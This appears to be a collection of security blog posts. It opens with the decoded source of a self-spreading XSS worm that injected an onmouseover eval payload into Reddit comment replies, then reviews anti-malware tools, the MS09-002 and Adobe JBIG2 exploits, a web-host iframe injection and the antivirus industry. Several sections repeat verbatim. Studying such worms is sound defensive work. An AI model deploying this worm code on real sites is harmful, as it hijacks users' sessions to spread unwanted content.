The (decoded) code of the worm is the following:

// generate payload/attack vector
// having trouble understanding why this works

z="[x][b]\n[b]:/["+this.innerHTML+"](/onmouseover=eval(unescape(this.innerHTML9371d7a2e3ae86a00aab4771e39d255d9371d7a2e3ae86a00aab4771e39d255d//)";

// and what's with the 9371d7a2e3ae86a00aab4771e39d255d9371d7a2e3ae86a00aab4771e39d255d ?

// "click" all reply links in page
o=document;
e=o.getElementsByTagName('a');
for(i=0;i<e.length;i++)
    if(e[i].innerHTML=='reply')
        $(e[i]).click();

// fill with payload
o=document;
e=o.getElementsByTagName('textarea');
for(i=0;i<e.length;i++)
    e[i].value=z;

// submit
e=o.getElementsByTagName('button');
for(i=0;i<e.length;i++)
    if(e[i].innerHTML=='save'&&e[i].style.display!='none')
        $(e[i]).click();

In the meantime of writing the article I tried to look for the invalid filtering in the source code, but as touching for the first time the code had no sense of direction. If someone would be kind enough to enlighten me in which file the code resides I’d be more than happy.

If not, we’ll have an unsolved mystery :)

UPDATE: worm author has happily shared its way of evading the filter.

UPDATE 2: post about the bug on the reddit blog.

Another thing about malware, as I pointed it out in my article about the AV industry, they tend to use the same code with minor modification; to be read as strains. If you’re new to this term (Malware), then I would recommend you an introductive article: Stop malware in it’s tracks.

Following the latest article on F-Secure Downadup has 2,395,963 infections worldwide. Of course this is an optimistic scenario, even for a skeptic person at numbers as I am. You can see now the big threat that malware posses, that’s why we should protect ourselves…

Greasemonkey: Malware Script Detector

Malware Script Detector is a Greasmonkey script which will:

Detect & Alert Malicious JavaScript : XSSProxy, XSS-Shell, AttackAPI, Beef. But No guarantee for full prevention of XSS-Injection threats. Many ways to bypass it such as via iframes but I’m sure it protects you from casual attackers.The main objective of developing Malware Script Detector is that I’m so much afraid of XSSProxy, XSS-Shell, AttackAPI, Beef and I want to detect them. Malicious sites intentionally embed them. Firefox XSS Warning addon can’t check this.

It’s a highly recommended script, because malware scripts can be as dangerous as normal malware. The difference is that normal malware posses little threat if you download software from official sources, and verify the checksum…

Malware Blocker

Malware Blocker is a tool useful before and after infection. The description of the program (as taken from SourceForge):

Malware-Blocker blocks communication from your computer to any server that is known to be a malicious one. It does that by replacing your HOSTS file (deep inside Windows directory) with a blacklist of malicious servers, which are redirected to 0.0.0.0

The projects last update is from February 2005. Although likely outdated it maintains a constant number of downloads, this being the reason I recommend it. Who knows what funky old school malware will you cross upon one day…

MalZilla

This is an unexpected turn, is it? First of all you would probably like to know what MalZilla is. In simple words:

Malzilla is an advanced malware-hunting tool specialized for hunting web-based exploits, decode obfuscated JavaScripts etc.

Although limited only for malware scripts I can guaranty you that its very good at it, giving you all the tools needed for such a task. More information in it’s own pdf file, which comes along with the package.

Most of you can ignore the last application presented, I would think that having the first two installed is more than enough for regular users. And no, it’s not dangerous playing with malware if you got the proper tools.

Eleven days ago Microsoft did a disclosure on the MS09-002. Seven days later we already had a proof of concept that was used in the wild, and today having even the Metasploit exploit.

Eleven days have passed, did you patch the vulnerability? Most of the users will not have it patched too soon, even if it comes with the automatic updates. Many just simply have automatic updates turned off. Even so, there are some patches which take a long time to be released, for example the MS08-078 patch did take a while to be released.

And here comes in Exploit Shield an application which will protect your from browser based exploits (either IE or Firefox), but don’t over trust it, as soon as a patch comes out you should fix the vulnerability.

Exploit Shield is designed to shield Web browsers between the development of an exploit and the release of the vendor’s patch.

Exploit Shield posses the following functionality: Zero Day Defense, Patch-Equivalent Protection, Proactive Measures, Protects Against All Websites and Automatic Feedback.

But does it work? Of course it does, check out the detection of a MS09-002 based exploit which was catched by the heuristics incorporated in the software.

It’s also a program that would be useful when researching/coding such exploits, although the automatic submission should be disabled in that case (*grin*).

If you haven’t got it yet, you can download it from here.

Adobe Reader oriented attack was also the malicious injection on my last hosting service…

In the recent issue of (in)SECURE Magazine, namely issue 21, there is an article named “Malicious PDF: Get owned without opening” by Didier Stevens which shown an exploit in an Adobe Reader filter which made possible successful exploitation without file opening.

When a PDF document is listed in a Windows Explorer window, the PDF column handler shell extension will be called by Windows Explorer when it needs the additional column info. The PDF column handler will read the PDF document to extract the necessary info, like the Title, Author, etc. (…) Under the right circumstances, a Windows Explorer Shell Extension will read the PDF document to provide extra information, and in doing so, it will execute the buggy code and trigger the vulnerability

Other ways how the exploit could be launched (from the explorer window) where by: selecting the pdf (left click), hovering over it and changing the folder view to “Thumbnail”.


All these previous exploitation scenarios required minimal user interaction, but the author had another card in his pocket. The JBIG2Decode vulnerability could be exploited by the Windows Indexing Service alone, the only difference being that this way the exploit would run with less privileges; namely with Local System ones…

There you have it, another reason to switch to a pdf reader alternative.

UPDATE: a resourceful article about pdf exploitation can be found here.

You’re not my friend!

At first, when I saw maliciously injected iframes in the my websites I thought it may have been a targeted attack. Some reasons why I supposed this was due to the reason that other websites found on the same IP weren’t affected, or at least that was the way it looked at first. This wouldn’t have been so weird because I (and my coworker) manage these websites, and he stores the passwords in the ftp clients he uses, having no antivirus (that had to be mentioned).

After more lurking on more websites that have been on the same IP address I’ve came across other infected ones… So my first theory was dismissed, along with the pleasure that I would had if blamed my college.

WordPress, is that you?

The second thing I suspected was some wordpress plugin, because almost all those that were infected had wordpress on them (even those that didn’t belong to us), so maybe there was some piece of PHP code in some pluggin that could have started the whole infection…

Downloaded a sample installation from the server and started greping it, first thing that poped up was that pluggable.php was also infected (forgot to mention, but the iframes where attached in index.php and index.html files)… but nothing else, so I came to my third and final scenario.

It’s your fault!

Given the above scenarios have been ravished my last tough was a server exploitation. So I submitted a ticked demanding some information giving this issue, which came with some poor response (and the reason I switched the hoster):

—

—

No hard feelings, I always accept suggestions, but we where not talking only about my account (I mentioned others where affected as well), so I requested a grep on the websites; maybe they could have found if it were a local attack… but I was disappointed again:

—

—

No, thank you, and kudos for the Chinese guy who did this… Later on I found out that mass injection compromised more than twenty-thousand web sites and suspect that my former hoster may have been also under that attack.

Another thing about malware, as I pointed it out in my article about the AV industry, they tend to use the same code with minor modification; to be read as strains. If you’re new to this term (Malware), then I would recommend you an introductive article: Stop malware in it’s tracks.

Following the latest article on F-Secure Downadup has 2,395,963 infections worldwide. Of course this is an optimistic scenario, even for a skeptic person at numbers as I am. You can see now the big threat that malware posses, that’s why we should protect ourselves…

Greasemonkey: Malware Script Detector

Malware Script Detector is a Greasmonkey script which will:

Detect & Alert Malicious JavaScript : XSSProxy, XSS-Shell, AttackAPI, Beef. But No guarantee for full prevention of XSS-Injection threats. Many ways to bypass it such as via iframes but I’m sure it protects you from casual attackers.The main objective of developing Malware Script Detector is that I’m so much afraid of XSSProxy, XSS-Shell, AttackAPI, Beef and I want to detect them. Malicious sites intentionally embed them. Firefox XSS Warning addon can’t check this.

It’s a highly recommended script, because malware scripts can be as dangerous as normal malware. The difference is that normal malware posses little threat if you download software from official sources, and verify the checksum…

Malware Blocker

Malware Blocker is a tool useful before and after infection. The description of the program (as taken from SourceForge):

Malware-Blocker blocks communication from your computer to any server that is known to be a malicious one. It does that by replacing your HOSTS file (deep inside Windows directory) with a blacklist of malicious servers, which are redirected to 0.0.0.0

The projects last update is from February 2005. Although likely outdated it maintains a constant number of downloads, this being the reason I recommend it. Who knows what funky old school malware will you cross upon one day…

MalZilla

This is an unexpected turn, is it? First of all you would probably like to know what MalZilla is. In simple words:

Malzilla is an advanced malware-hunting tool specialized for hunting web-based exploits, decode obfuscated JavaScripts etc.

Although limited only for malware scripts I can guaranty you that its very good at it, giving you all the tools needed for such a task. More information in it’s own pdf file, which comes along with the package.

Most of you can ignore the last application presented, I would think that having the first two installed is more than enough for regular users. And no, it’s not dangerous playing with malware if you got the proper tools.

Contrary to some industry observers, antivirus software is not dead. It is, however, undergoing a game-changing transformation.

Here should be noted that by game-changing the author (Carey Nachenberg) is really saying that the antivirus software will be “antivirus” software only by name.

What do I mean by that? To tell you honestly I think that the VX (Virus eXchange) scene is dying slowly and only a couple, or should I say handful, of viruses/worms emerge annually. Without the virus creators, there should be no future for AV, right? Wrong!

AV software for many years detects Malware (Spyware, Trojan, RAT, Rootkits?) and if it were not for the strong impact of the word Virus I would be really sure they would be called Anti-Malware.

By some measurements, the volume of malicious software is now outpacing the production of legitimate programs. Symantec recently measured the adoption rate of new software
applications and found that out of almost 55,000 unique applications deployed during a weeklong measurement period on Microsoft Windows PCs, 65 percent were malicious.

This proves the fact that nowadays Malware do the harm, not viruses. I know some of you knew that, but it had to be said for those who didn’t.

(…) attackers can easily circumvent most generic signatures by tweaking existing malware files, scanning them with an antivirus scanner, and repeating the process until the scanner no longer detects the infection. Such modifications can be
done by hand or, unfortunately, all too easily via automation.

That doesn’t sound so new, it reminds me of the first tutorial I read about making viruses undetectable. And it’s not a new either, it’s a tutorial that dates as back as 1991, called How To Modify A Virus So SCAN Won’t Catch It.

Clearly, in such an environment, traditional signature-based detection – or blacklisting – alone is not enough.

You don’t say… What about heuristics, it’s been around for more than a decade, and great things can be done with it. I have in mind an AV program that implemented it quite well, but I don’t want to make from this article a promotive one.

As the volume of malicious code continues to skyrocket, security techniques must increasingly focus less on analyzing malware and more on analyzing “goodware.”

Whitelisting was, and is, always a better choice, in my opinion, than blacklisting.

Similarly, it!s difficult for security companies to locate less
popular, yet entirely legitimate, software applications and add them to a whitelist. Imagine a small software vendor that caters to just a handful of customers. What are the odds that this vendor!s software will be discovered and added to a whitelist in a timely fashion?

About the same as winning the lottery.

Perhaps the greatest benefit of a hybrid approach is that it would finally return the burden of antivirus protection from the shoulders of weary customers back to security vendors

Perhaps…